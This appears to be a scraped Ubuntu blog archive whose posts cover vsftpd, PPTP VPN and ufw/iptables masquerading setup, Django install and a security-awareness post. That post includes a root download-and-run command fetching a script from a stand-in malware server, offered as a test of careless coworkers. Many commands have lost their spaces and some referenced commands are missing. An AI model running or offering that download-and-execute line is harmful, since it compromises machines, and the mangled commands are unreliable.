When you install custom GTK themes, applications running as root will still look ugly.
To make your current installed themes available to the root account as well, you just need to run these in your terminal:
Sometimes I use Songbird to listen to my music files or internet radio. On some systems running Ubuntu 8.10 it does not run. The error is a known bug reported by some people.
The resolution is simple. Just remove libvisual-0.4-plugins.
Django is a high-level Python Web framework that encourages rapid development and clean, pragmatic design.
To install it on your Ubuntu, follow the next steps:
1. Install python (if you have it installed, skip this step)
Shell
1
sudo apt-getinstall python
2. Download the tarball from the Django Project website. You can download this file to your home directory.
3. Now we can just move this entire package to somewhere logical. You can move it anywhere you like, but remember to modify the links accordingly. I use /usr/local/lib/.
In the next version of Ubuntu, codenamed Jaunty Jackalope, the users will be prestented with new looks. Softpedia has already posted screenshots of the new login screen, themes, and USplash theme. Though no new background has been selected yet, there are already some great ones.
vsftpd is a GPL licensed FTP server for UNIX systems, including Linux. It is secure and extremely fast.
Using this instructions, you can set up vsftpd on variuos linux distros. This tutorial will show you how to set up your own ftp in Ubuntu Linux.
1. Install vsftpd
Shell
1
sudo apt-getinstall vsftpd
2. Change the configurations file
Open the vsftpd.conf configuration file with a text editor. The file is located in the /etc directory.
Shell
1
sudo joe/etc/vsftpd.conf
Once you are editing the file, you’ll want to make a few changes. Change this:
Shell
1
anonymous_enable=YES
To this:
Shell
1
anonymous_enable=NO
This will disallow anonymous access to your FTP server. Unless you have a really good reason for permitting anonymous access, and you know what you’re doing in terms of network security, I’d recommend leaving the anonymous access off. Especially if your Ubuntu FTP server is sitting on the Internet.
Of course, with anonymous access off, you’ll need to permit local users to log in. Do this by changing this directive:
Shell
1
#local_enable=YES
To this:
Shell
1
local_enable=YES
(Putting a # in front of a line disables it; this is called “commenting it out”.)
3. Adding a “fake” shell
Edit the /etc/shells file and add a non-existent shell name like /bin/false, for example. This fake shell will limit access on the system for FTP users.
Shell
1
sudo joe/etc/shells
Shell
1
2
3
4
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/false
/bin/false is our added no-existent shell. With Red Hat Linux, a special device name /dev/null exists for purposes such as these.
4. Setup an FTP user account
It’s important to give to your strictly FTP users no real shell account on the Linux system. In this manner, if for any reasons someone could successfully get out of the FTP chrooted environment, it would not have the possibility of executing any user tasks since it doesn’t have a bash shell. First, create new users for this purpose.
This has to be separate from a regular user account with unlimited access because of how the chroot environment works. Chroot makes it appear from the user’s perspective as if the level of the file system you’ve placed them in is the top level of the file system.
Use the following command to create users in the /etc/passwd file. This step must be done for each additional new user you allow to access your FTP server.
– The mkdir command will create the ftp/ftpuser directory under the /home directory to handle all FTP users’ home directories we’ll have on the server.
– The useradd command will add the new user named ftpuser to our Linux server.
– Finally, the passwd command will set the password for this user ftpuser.
Once you’ve made these changes, restart the vsftpd service with this command:
Shell
1
sudo/etc/init.d/vsftpd restart
5. Override config option specified in the manual page, on a per-user basis (optional)
If you want to make custom changes in the behaviour of the ftp server on a per-user basis, you should know that vsftpd has a powerful option that allows you to do this.
If you set user_config_dir to be /etc/vsftpd_user_conf and then log on as the user “chris”, then vsftpd will apply the settings in the file /etc/vsftpd_user_conf/chris for the duration of the session. The format of this file is detailed in the manual!
Please note that not all settings are effective on a per-user basis. For example, many settings only prior to the user’s session being started. Examples of settings which will not affect any behviour on a per-user basis include listen_address, banner_file, max_per_ip, max_clients, xferlog_file, etc.
easy.MEDIA launched a website monitoring service (www.e-nagios.com) based on nagios.
The service offers SMS/Email notification to meet your need for mobility.
The servers/websites will be crossed-monitored to avoid false alarms.
After reading an interesting article about linux “viruses” (the comments are interersing, too), I decided to raise the alarm about the source of many security related issues
in today’s computers: the user.
The author talks about the many ways to compromise a linux box, even if you are not root.
I will not get into techinal methods, you can find them on the internet or by reading the original article. Instead I will talk about the regular user.
From my experience I know for sure that a regular user could compromise his own system.
Don’t belive me? Make a little test.
1. For Windows
– rename any executable file as “virus.exe”, put it on a web server and give the link to your coworkers by email, instant messenger, whatever.
2. For Linux
– put them to open terminal and type “sudo su -” and then “wget http://www.your_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py”
You’ll be surprised by their actions. You’ll find out that many will open the link or run the commands.
For many of you this will not be a surprise. You’ll say: “I know someone who will instinctively click on the link!”.
Think about that every one of us knows a person like that.
It’s not a hard thing to make the user click on a link or run a command.
The attackers just have to find ways to extract informations from the compromised box.
In the end of the article, the author talks about solutions to this problem.
The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken seriously.
In conclusion, there are no bullet-proof systems, only users who are too careless and click every link in their’s mouse way.
Uncomment the following lines (replace IP range if you like)
Shell
1
2
localip192.168.0.1
remoteip192.168.1.1-255
Save and exit.
Edit /etc/ppp/pptpd-options file
Shell
1
sudo joe/etc/ppp/pptpd-options
Make sure you have this:
Shell
1
2
3
4
5
6
7
8
9
10
11
12
refuse-pap
refuse-chap
refuse-mschap
require-mschap-v2
require-mppe-128
proxyarp
nodefaultroute
lock
nobsdcomp
noipx## you don't need IPX
mtu1490## may help your linux client from disconnecting
mru1490## may help your linux client from disconnecting
Save and exit.
Next step is to add users who can use this connection.
Shell
1
sudo joe/etc/ppp/chap-secrets
The file should look like this:
Shell
1
2
3
4
# Secrets for authentication using CHAP
# client server secret IP addresses
cviorel pptpd my_secret_password*
another_user pptpd his_secret_password*
Now we need to configure IP Masquerading on the VPN server.
The purpose of IP Masquerading is to allow machines with private, non-routable IP addresses on your network to access the Internet through the machine doing the masquerading.
ufw Masquerading
IP Masquerading can be achieved using custom ufw rules. This is possible because the current back-end for ufw is iptables-restore with the rules files located in /etc/ufw/*.rules. These files are a great place to add legacy iptables rules used without ufw, and rules that are more network gateway or bridge related.
The rules are split into two different files, rules that should be executed before ufw command line rules, and rules that are executed after ufw command line rules.
a) First, packet forwarding needs to be enabled in ufw. Two configuration files will need to be adjusted, in /etc/default/ufw change the DEFAULT_FORWARD_POLICY to “ACCEPT”:
Shell
1
DEFAULT_FORWARD_POLICY="ACCEPT"
Then edit /etc/ufw/sysctl.conf and uncomment:
Shell
1
net.ipv4.ip_forward=1
Similarly, for IPv6 forwarding uncomment:
Shell
1
net.ipv6.conf.default.forwarding=1
b) Now we will add rules to the /etc/ufw/before.rules file. The default rules only configure the filter table, and to enable masquerading the nat table will need to be configured. Add the following to the top of the file just after the header comments:
Shell
1
2
3
4
5
6
7
8
9
# nat Table rules
*nat
:POSTROUTING ACCEPT[0:0]
# Forward traffic from eth1 through eth0.
-APOSTROUTING-s192.168.0.0/24-oeth0-jMASQUERADE
# don't delete the 'COMMIT' line or these nat table rules won't be processed
COMMIT
The comments are not strictly necessary, but it is considered good practice to document your configuration. Also, when modifying any of the rules files in /etc/ufw, make sure these lines are the last line for each table modified:
Shell
1
2
# don't delete the 'COMMIT' line or these rules won't be processed
COMMIT
First, since we trust pptpd completely, I would accept all traffic to/from my pptpd. I added this lines at the beginning of the filter section.
Shell
1
2
-Aufw-before-input-ippp+-jACCEPT
-Aufw-before-output-ippp+-jACCEPT
Additionally, I must forward traffic to/from my pptpd. These lines was also added after the above lines.
Shell
1
2
-Aufw-before-forward-s192.168.0.0/24-jACCEPT
-Aufw-before-forward-d192.168.0.0/24-jACCEPT
c) Finally, disable and re-enable ufw to apply the changes:
Shell
1
sudo ufw disable&&sudo ufw enable
IP Masquerading should now be enabled. You can also add any additional FORWARD rules to the /etc/ufw/before.rules. It is recommended that these additional rules be
added to the ufw-before-forward chain.
iptables Masquerading
iptables can also be used to enable masquerading.
a) Similar to ufw, the first step is to enable IPv4 packet forwarding by editing /etc/sysctl.conf and uncomment the following line:
Shell
1
net.ipv4.ip_forward=1
If you wish to enable IPv6 forwarding also uncomment:
Shell
1
net.ipv6.conf.default.forwarding=1
– Next, execute the sysctl command to enable the new settings in the configuration file:
Shell
1
sudo sysctl-p
– IP Masquerading can now be accomplished with a single iptables rule, which may differ slightly based on your network configuration:
The above command assumes that your private address space is 192.168.0.0/16 and that your Internet-facing device is ppp0. The syntax is broken down as follows:
-t nat — the rule is to go into the nat table
-A POSTROUTING — the rule is to be appended (-A) to the POSTROUTING chain
-s 192.168.0.0/16 — the rule applies to traffic originating from the specified address space
-o ppp0 — the rule applies to traffic scheduled to be routed through the specified network device
-j MASQUERADE — traffic matching this rule is to “jump” (-j) to the MASQUERADE target to be manipulated as described above
b) Also, each chain in the filter table (the default table, and where most or all packet filtering occurs) has a default policy of ACCEPT, but if you are creating a firewall in addition to a gateway device, you may have set the policies to DROP or REJECT, in which case your masqueraded traffic needs to be allowed through the FORWARD chain for the above rule to work:
The above commands will allow all connections from your local network to the Internet and all traffic related to those connections to return to the machine that initiated them.
c) If you want masquerading to be enabled on reboot, which you probably do, edit /etc/rc.local and add any commands used above. For example add the first command with no filtering:
Logs
Firewall logs are essential for recognizing attacks, troubleshooting your firewall rules, and noticing unusual activity on your network. You must include logging rules in your firewall for them to be generated, though, and logging rules must come before any applicable terminating rule (a rule with a target that decides the fate of the packet, such as ACCEPT, DROP, or REJECT).
If you are using ufw, you can turn on logging by entering the following in a terminal:
Shell
1
sudo ufw logging on
To turn logging off in ufw, simply replace on with off in the above command.
If using iptables instead of ufw, enter:
The above log will also appear in /var/log/messages, /var/log/syslog, and /var/log/kern.log. This behavior can be modified by editing /etc/syslog.conf appropriately or by installing and configuring ulogd and using the ULOG target instead of LOG. The ulogd daemon is a userspace server that listens for logging instructions from the kernel specifically for firewalls, and can log to any file you like, or even to a PostgreSQL or MySQL database. Making sense of your firewall logs can be simplified by using a log analyzing tool such as fwanalog, fwlogwatch, or lire.
NOTE: Documentation for this article is taken from https://help.ubuntu.com/8.04/serverguide/C/firewall.html.
I just added a new hard-drive to my system. I created an ext3 partition and used vol_id and blkid to show the UUID. Based on that information, I edited the /etc/fstab file accordingly. When I try the sudo mount -a command, I get
Shell
1
mount:special device/dev/disk/by-uuid/*the uuid of the newpartition*does notexist
and the mount fails.
To resolve that, just use
Shell
1
sudo partprobe
It updates the /dev/disk/by-uuid directory and your uuid mount works like a charm.
Some guys at Princeton University published the results of their attacks on popular disk encryption systems (BitLocker, FileVault, dm-crypt, and TrueCrypt) using no special devices or materials.
Find out more about their research here and here.